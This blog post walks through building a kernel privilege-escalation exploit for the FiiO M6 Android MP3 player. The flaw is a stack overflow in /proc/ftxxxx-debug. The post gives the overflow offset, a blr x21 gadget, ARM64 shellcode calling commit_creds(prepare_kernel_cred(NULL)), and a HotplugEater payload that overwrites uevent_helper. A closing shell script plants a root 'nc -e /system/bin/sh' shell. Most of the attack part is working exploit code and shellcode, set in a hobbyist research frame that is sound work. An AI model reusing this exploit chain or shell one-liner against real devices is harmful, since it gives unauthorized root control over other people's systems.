Overview:

A little over a month ago, I wrote a blog post detailing how I found a kernel vulnerability in the FiiO M6 Hi-Fi MP3 player. I would recommend reading that post first, but to recap:

The device is Android-based, running a version 3.18 AArch64 Linux kernel.
The ftxxxx-debug entry in procfs has a write handler which suffers from a straightforward stack buffer overflow: it reads an arbitrary amount of user-controlled data into a fixed-size kernel stack buffer using the copy_from_user function.

fiio_image

Having never done any kernel exploit dev, the thought of turning this bug into a weaponized privilege escalation initially felt out of the picture. However, upon further consideration, I realized this was essentially the “Hello World” of Linux exploitation on a real-world device; if I was gonna find an entry point into the field, this might as well be it. What followed was 30 days filled with reading, learning, and a LOT of waiting for the device to reboot after crashing. The remainder of this post will cover the technical details of the successful exploit, skimming over the extensive trial and error which took place. I may include a part 3 post or video recapping and reflecting on the project and going more in-depth on the learning process.

TL;DR:

The device does not have any stack canaries, so our overflow allows us to directly overwrite the saved x30 return address. While SMAP/SMEP are enabled, the kernel stack is marked as executable and KASLR is disabled. At the time of our overflow, register x21 always holds a pointer into the kernel stack, at a location which contains our user-controlled data. We can use a blr x21 gadget to jump to custom shellcode included in the overflow payload. Our shellcode performs a “HotplugEater” attack, in which uevent_helper is overwritten with the path of an attacker-controlled script, which the kernel then executes with root permissions. While there are numerous more “standard” ways to achieve the same effect once you control the PC, the inability to do any kernel debugging and the lack of ARM64 Linux kernel exploitation resources presented significant hurdles.

Picking Up Where We Left Off:

Finding the Offset To The Saved Return Pointer:

At the end of the previous post, I released a Crash PoC for the vulnerability. It has been included again below:

  
use std::fs::OpenOptions;
use std::io::Write;

fn main() {
    // Create a payload long enough to overrun the kernel buffer
    let buf = vec![0x41u8; 32 * 1024];
    println!("{}", buf.len());

    // Open /proc/ftxxxx-debug for writing
    let path = "/proc/ftxxxx-debug";
    let fd = OpenOptions::new().write(true).open(path);

    println!("Writing {:?}", path);
    if let Ok(mut fd) = fd {
        // A single write() of the whole buffer triggers the overflow
        let _ = fd.write(&buf);
    }
}

For this proof-of-concept code, I chose an arbitrarily long buffer (32 * 1024 bytes) which I knew would cause a crash. However, after confirming there were no stack canaries, the first step for the exploit was to determine the offset to the saved link register (x30). On ARM64, a function that calls other functions saves x30 on the stack in its prologue and restores it from the stack in its epilogue. The RET instruction then branches to whatever address x30 holds.

To determine the offset, I manually created random payloads and then checked what the PC value was in the kernel crash. After a few attempts, I was able to determine that the offset was 1024 bytes. As such, we can update the crash PoC to have the following payload:

  
// ... previous code ...
let mut buf = vec![0x41u8; 8 * 128]; // 1024 bytes of junk 0x41s
let mut buf1 = vec![0x42u8; 8]; // 8 bytes of 0x42, overwriting our saved x30 address
buf.append(&mut buf1);
// ... previous code ...

Reviewing the kernel panic now, the PC is filled with our eight 0x42 bytes, indicating that we have successfully found the offset to the saved x30 value and can redirect program execution.

kernel_panic_offset

Obtaining the Kernel Symbols:

The next step of the process was to obtain kernel symbols. While our shell user does have read permissions to /proc/kallsyms, kptr_restrict is set to 2 and thus all the addresses are shown as 0.

kptr_restrict

After a bit of digging, I found a GitHub repo dedicated to extracting symbols from ARM64 Android Kernel images. I was able to obtain the firmware for the FiiO M6 directly from their website. Extracting the provided zip file was enough to obtain the kernel image individually. Using it with the script from GitHub, we can dump all the kernel symbols! Since there’s no KASLR, these are static values which we can hardcode into our exploit.

ksyms_finder

Kernel Debugging?

Since this was my first kernel exploit ever, I was really hoping to get some form of a debug set-up working. I assumed the contents inside the FiiO firmware package would be enough to get an emulated kernel up and running. However, after a week of attempting, I had made no progress. I am still fairly confident it can be done, but I couldn’t figure it out and didn’t want to spend any more time on it. I switched gears a bit and tried to patch the bootloader to root the device, but this also proved unsuccessful. I decided to proceed with no debugging capabilities, and return only if I couldn’t figure out how to craft an exploit without them.

Exploitation:

Initial Strategy:

Now that we have kernel symbols and the ability to redirect program execution, it’s time to come up with an exploit strategy. After a few days of learning about Linux privesc exploit techniques, I decided that using the classic commit_creds(prepare_kernel_cred(NULL)) path would probably be best. You can learn more about this privesc strategy here but the quick summary is:

prepare_kernel_cred creates a root-privileged cred when called with a NULL argument
commit_creds takes a pointer to a cred structure, and sets the current process to have that privilege level

Therefore, commit_creds(prepare_kernel_cred(NULL)) sets the process’s privilege level to root. After that, we just return execution out of kernel mode and back to our userland process.

Surely The Stack Isn’t Executable, Right…?

With our exploit strategy in mind, I set out to write a ROP chain. There are almost no publicly available resources on ARM64 kernel ROP, but I was able to find some useful posts about userland exploitation, such as a post from Perfect Blue and a talk from Billy Ellis.

As the architecture expands in popularity, maybe one day we will see more write-ups on the subject. Today, however, is not that day. About midway through struggling to craft and debug a proper ROP chain, I spotted something interesting. The x21 register pointed to an area on the stack which we could overflow with anything we wrote after overwriting the saved x30 value. For example, we can use the following code:

  
#include <fcntl.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>

uint64_t fake_ret_addr = 0x4242424242424242ULL;  // lands in the saved x30
uint64_t x21_overflow = 0x4343434343434343ULL;   // marker for the data after it

static int exploit() {
  int fd = open("/proc/ftxxxx-debug", O_RDWR);
  if (fd < 0) {
    return -1;
  }

  unsigned char buf[4096];
  memset(buf, 0x41, 1);
  memset(buf + 1, 0x0, 1023);

  // 1024 bytes of padding, then the saved x30, then 12 marker words
  uint64_t *chain = (uint64_t *)&buf[1024];
  *chain++ = fake_ret_addr;
  for (int i = 0; i < 12; i++) {
    *chain++ = x21_overflow;
  }

  write(fd, buf, 4096);
  close(fd);
  return 0;
}

Reviewing the crash logs now, we can see that x21 holds our 0x43s.

x21_overflow

I had been under the assumption that the stack was not executable, but I decided there was no harm putting this belief to the test. I used ropper to find a blr x21 gadget and overwrote the saved x30 with it. This would redirect code execution to the pointer stored in x21.

  
uint64_t kernel_base = 0xFFFFFFC000080000ULL;
uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;  // address of the blr x21 gadget

// ... previous code ...
  uint64_t *chain = (uint64_t *)&buf[1024];
  *chain++ = blr_x21;  // the saved x30 now points at the gadget
  for (int i = 0; i < 24; i++) {
    *chain++ = x21_overflow;
  }

If the stack was executable, this address would then be dereferenced and our junk data would be interpreted as code. It at least seemed worth a shot…

pc_eq_x21

We can see above that our PC value and x21 value are the same, indicating that our ROP chain seems to have executed properly. We also get the following line from the end of the kernel panic:

call_trace_x43

This error message seems to indicate that our 0x43s are being interpreted as valid instructions, but it’s still hard to tell. Maybe the error message is just a fluke?

I changed the entire chain to be NOPs, except the last line, which was still our x21_overflow junk data.

  
uint64_t nop = 0xd503201fd503201fULL;  // two AArch64 NOPs (0xd503201f) packed into one 64-bit word

// ... previous code ...
  uint64_t *chain = (uint64_t *)&buf[1024];  
  *chain++ = (uint64_t)blr_x21;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)nop;  

// ... continue chain

  *chain++ = (uint64_t)nop;  
  *chain++ = (uint64_t)x21_overflow;  

If the code on the stack was actually executing, it would go down the NOP sled before throwing the same error. Furthermore, our PC would now point to a different address than x21, since it successfully executed instructions.

x21_neq_pc nop_code_trace

I was honestly in disbelief that this worked. We now have a very simple gadget which reliably allows us to jump to our own shellcode, executing in supervisor mode (EL1).

Writing The Shellcode:

The obvious next step was to come up with our shellcode. In order to do that, we need to grab the addresses for both commit_creds and prepare_kernel_cred

prepare_and_commit_addr

After that, we can start putting together some ARM64 assembly:

mov x0, xzr              // move 0x0 into x0 
mov x2,  #0x6368         // mov addr of prepare_kernel_cred into x2
movk x2, #0x000b, lsl #16  
movk x2, #0xffc0, lsl #32  
movk x2, #0xffff, lsl #48  
blr x2                   // branch to addr in x2
mov x4,  #0x5ffc         // mov addr of commit_creds into x4
movk x4, #0x000b, lsl #16  
movk x4, #0xffc0, lsl #32  
movk x4, #0xffff, lsl #48  
blr x4                   // branch to addr in x4

...

This code works as follows:

Move 0x0 into x0. ARM64 specifies that x0 will always hold the first argument when a function is called. We want the argument passed to prepare_kernel_cred to be NULL, which is equivalent to 0x0
Load the address of prepare_kernel_cred into x2 and branch to it
The return value of prepare_kernel_cred is a pointer to the newly created credential. ARM64 specifies that return values are passed back to the caller in x0. This works out for us, because the next step is to call commit_creds with a pointer to our cred as the argument in x0. Thus we don’t have to do anything when prepare_kernel_cred returns
Load the address of commit_creds into x4 and branch to it.

After this, we need to switch out of supervisor mode and cleanly return to userland. This is where things became significantly less straightforward. A few things need to happen:

We need to specify what address to return to
We need to restore the userland stack pointer
We need to set saved program status registers

The good news is that because x21 consistently holds a pointer into our user-controlled data, we can pass a userland stack pointer and userland return value via our buffer overflow payload.

To debug this, we will compile the above shellcode which doesn’t yet return from supervisor mode. We will make the last instruction 0x41414141, causing a kernel panic and allowing us to dump the register states. Our exploit payload will include a bogus stack pointer and the address of the function we wish to return to. We can then review the kernel panic logs in order to determine the offsets and finish out our shellcode. In all, our exploit functions look as follows:

  
#include <fcntl.h>
#include <spawn.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
#include <iostream>

uint64_t kernel_base = 0xFFFFFFC000080000ULL;
uint64_t blr_x21 = 0x000000000001e664ULL + kernel_base;
uint64_t nop = 0xd503201fd503201fULL;
uint64_t junk = 0x4242424242424242ULL;

// Userland function the shellcode is meant to return to
static int win() {
  puts("[+] Returned from supervisor mode\n");
  const char *argv[] = { "busybox1.11", "touch", "/data/local/tmp/test.txt", NULL };
  char *envp[] = { NULL };
  puts("[!] Win\n");
  execve("/system/bin/busybox1.11", (char *const *)argv, envp);
  return 0;
}

static int exploit() {
  int fd = open("/proc/ftxxxx-debug", O_RDWR);
  if (fd < 0) {
    puts("[!] open failed!");
    return -1;
  }
  unsigned char buf[4096];
  memset(buf, 0x41, 1);
  memset(buf + 1, 0x0, 1023);

  uint64_t stack_size = 0x1000;
  void *stack_base = mmap(NULL, stack_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);
  if (stack_base == MAP_FAILED) {
    puts("[!] mmap failed!");
    return -1;
  }
  void *stack_top = (void *)((uint64_t)stack_base + stack_size);
  // &stack_top is the address of this local variable, which is the value placed in the payload
  printf("[+] Stack Pointer: %llx\n", (unsigned long long)&stack_top);
  printf("[+] win() address: %llx\n", (unsigned long long)&win);

  unsigned char shellcode[] = {
    0xe0, 0x03, 0x1f, 0xaa, 0x02, 0x6d, 0x8c, 0xd2,
    0x62, 0x01, 0xa0, 0xf2, 0x02, 0xf8, 0xdf, 0xf2,
    0xe2, 0xff, 0xff, 0xf2, 0x40, 0x00, 0x3f, 0xd6,
    0x84, 0xff, 0x8b, 0xd2, 0x64, 0x01, 0xa0, 0xf2,
    0x04, 0xf8, 0xdf, 0xf2, 0xe4, 0xff, 0xff, 0xf2,
    0x80, 0x00, 0x3f, 0xd6,
    0x41, 0x41, 0x41, 0x41,   // Bad instruction to cause kernel panic
  };

  uint64_t *chain = (uint64_t *)&buf[1024];
  *chain++ = blr_x21;               // overwrites the saved x30
  *chain++ = junk;
  *chain++ = junk;
  *chain++ = junk;
  *chain++ = (uint64_t)&win;        // userland return address
  *chain++ = (uint64_t)&stack_top;  // userland stack pointer
  for (int i = 0; i < 18; i++) {    // NOP sled leading up to the shellcode
    *chain++ = nop;
  }

  // 24 chain words * 8 bytes = 192, so the shellcode starts at 1024 + 192 = 1216
  memcpy(buf + 1216, shellcode, sizeof(shellcode));
  puts("[+] Ropping to shellcode...");
  write(fd, buf, 1024 + 1216 + sizeof(shellcode));
  return 0;
}

int main() {
  std::cout << "[+] Starting trigger...\n";
  exploit();
  return 0;
}

Running it, we get a kernel panic as expected.

all_regs_kernel_crash

Let’s break down the kernel crash logs. First of all, we see that x0 is equal to 0x0. This is what we want to see: commit_creds returns 0 when it completes without issue, so we can take this as an indicator that our shellcode was able to successfully execute. Also note that x21 is equal to 0xffffffc01521fec8.

Scrolling down, the crash dump gives us the data where x21 is currently pointing. Note that data before and after the actual pointer is shown (x21 is pointing at the fec8 line).

x21_contents

We can note that our win() address (0x0000000078942300) is stored at x21 - 0x80. The next 8 bytes are our bogus stack pointer which we mmapped before the payload. With this information, we can finish out our shellcode to return to usermode:

// ... previous code ...
sub x2, x21, #0x80  // store pointer to win address in x2
ldr x1, [x2]        // deref pointer into x1. x1 now holds win() address
ldr x4, [x2, #0x08] // deref pointer+0x8 into x4. x4 now holds fake stack pointer
mov x0, xzr         // move 0 into x0 
MSR SP_EL0, x4      // set EL0 (usermode) stack pointer to x4
MSR ELR_EL1, x1     // set EL1 (kernelmode) return address to x1
MSR SPSR_EL1, x0    // set status regs to 0x0
ERET

Game over, right?

segfault

Not quite. We do successfully return from supervisor mode with our elevated privs. However, as soon as we try to make another syscall, the program segfaults. The device itself doesn’t crash, but our program stops running. Because we did elevate our privs on the process itself, we have root for a nanosecond, but we can’t even do anything interesting with it.

I spent over a week trying to debug this issue (which, looking back on it, was way too much time). The segfault almost certainly stemmed from the ugly way the shellcode ERETs back to userspace without taking into account the previous state, the call stack, or any other information. I tried numerous techniques to save / restore the state and jump to different areas of my code, but nothing seemed to work. Being so close to having a root shell, I was reluctant to step back and try a different approach. But after officially running out of ideas, I went back to the drawing board.

Back To The Drawing Board:

To recap, we currently have the following:

Read, write, and execute primitives in EL1 (supervisor mode)
The ability to return from supervisor mode without crashing the kernel, but without being able to make another syscall or fork our current process.

With this information, I went to Google and started poking around. I should also shout out some friends in one of my private exploit dev discords who provided a few suggestions. In the end, however, it was a random slide deck from 2016 which provided the breakthrough.

The HotplugEater Attack:

This presentation by Dong-Hoon You introduced a technique he called the HotplugEater Attack. I have included the relevant slide below:

hotplug_eater_slide

The idea is as follows:

The global variable uevent_helper holds the path of a helper program which the kernel runs on a hotplug event.
If we can overwrite this variable with the path of an attacker-controlled script, that script will execute with root permissions.
Simply changing the variable is enough: no further trigger is needed on our side, because the next uevent the kernel generates goes through the kobject_uevent_env function, which will in turn call our malicious script.

Putting It All Together:

We can dump the address of uevent_helper with the Python script we used earlier.

Our new exploit will now work as follows:

1. Create a script in /data/local/tmp/ which we want to execute with root permissions
2. Trigger our overflow on ftxxxx-debug and ROP to our shellcode
3. The shellcode will overwrite uevent_helper with the path to our malicious script in /data/local/tmp, return to usermode, and gracefully exit (by way of segfaulting).
4. After ~10 seconds, the kernel will execute our script

With this in mind, we need to write some new shellcode which performs the actions outlined in point number 3. That shellcode has been included and commented below:

mov x2,  #0xc7c8          // move the address of `uevent_helper` into x2
movk x2, #0x00c2, lsl #16  
movk x2, #0xffc0, lsl #32  
movk x2, #0xffff, lsl #48  
  
mov w3, #'/'              // store the value `/data/local/tmp/cmd` byte by byte at x2 
strb w3, [x2]  
mov w3, #'d'  
strb w3, [x2, #1]  
mov w3, #'a'  
strb w3, [x2, #2]  
mov w3, #'t'  
strb w3, [x2, #3]  
mov w3, #'a'  
strb w3, [x2, #4]  
mov w3, #'/'  
strb w3, [x2, #5]  
mov w3, #'l'  
strb w3, [x2, #6]  
mov w3, #'o'  
strb w3, [x2, #7]  
mov w3, #'c'  
strb w3, [x2, #8]  
mov w3, #'a'  
strb w3, [x2, #9]  
mov w3, #'l'  
strb w3, [x2, #10]  
mov w3, #'/'  
strb w3, [x2, #11]  
mov w3, #'t'  
strb w3, [x2, #12]  
mov w3, #'m'  
strb w3, [x2, #13]  
mov w3, #'p'  
strb w3, [x2, #14]  
mov w3, #'/'  
strb w3, [x2, #15]  
mov w3, #'c'  
strb w3, [x2, #16]  
mov w3, #'m'  
strb w3, [x2, #17]  
mov w3, #'d'  
strb w3, [x2, #18]  
mov x3, xzr               // terminate our string: move 0x0 into x3 and store its 8 zero bytes starting at x2 + 19
str x3, [x2, #19]  
  
sub x2, x21, #0x80        // ret to our win() function the same way we did in the previous shellcode
ldr x1, [x2]  
ldr x4, [x2, #0x08]  
mov x0, xzr  
MSR SP_EL0, x4  
MSR ELR_EL1, x1  
MSR SPSR_EL1, x0  
ERET

We can create an exploit shell script which does the following:

  
#!/system/bin/sh
echo "[+] Creating malicious script at /data/local/tmp/cmd..."
echo "#!/system/bin/sh" > /data/local/tmp/cmd
echo "/system/bin/busybox1.11 nc 127.0.0.1 4444 -e /system/bin/sh" >> /data/local/tmp/cmd
chmod 777 /data/local/tmp/cmd

echo "[+] Starting exploit..."  
/data/local/tmp/poc 2>/dev/null  
sleep 5

echo "[+] Launching listener..."  
echo "[!] Wait for r00t shell..."  
/system/bin/busybox1.11 nc -lp 4444

This script will create a new shell script at /data/local/tmp named cmd, which lines up with the path written by our shellcode. cmd’s only function is to forward a shell to a localhost listener on port 4444.

The script then runs our exploit code, which will overwrite the uevent_helper variable to point at our cmd file. Finally, we launch a listener on port 4444 waiting for the kernel to execute the cmd file, giving us a root shell.

whoami_root

The full exploit code can be found on my GitHub.

Next Steps:

While this project is pretty much over, the last thing I would love to do is pack the exploit into an APK and give users the ability to root their device.

I also have some other Android-based devices lying around the house, such as the HiSense Touch and the Onyx Pocket 2. This project has been a ton of fun, so maybe I will pick one of those to target in the future.

If you enjoyed this post and want to stay up to date on my future research projects, feel free to give me a follow on Twitter.

Rooting the FiiO M6 - Part 2 - Writing an LPE Exploit For Our Overflow Bug